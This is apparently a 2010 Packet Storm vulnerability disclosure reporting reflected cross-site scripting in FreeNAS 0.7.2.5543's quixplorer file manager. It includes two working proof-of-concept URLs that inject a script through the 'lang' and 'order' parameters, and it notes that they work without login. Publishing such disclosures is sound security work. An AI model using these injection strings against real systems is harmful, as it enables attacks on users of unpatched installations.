Freenas 0.7.2.5543 Cross Site Scripting

2010-12-20T00:00:00
ID PACKETSTORM:96827
Type packetstorm
Reporter dave b
Modified 2010-12-20T00:00:00

Description

                                        
                                            `Good morning, you can xss freenas stable (0.7.2.5543)  
like this  
  
http://192.168.0.1/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
  
or this ...  
http://192.168.0.1/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes  
etc.  
  
This will work regardless of the user being logged into the quixplorer  
module or freenas.  
  
--  
question = ( to ) ? be : ! be; -- Wm. Shakespeare  
  
`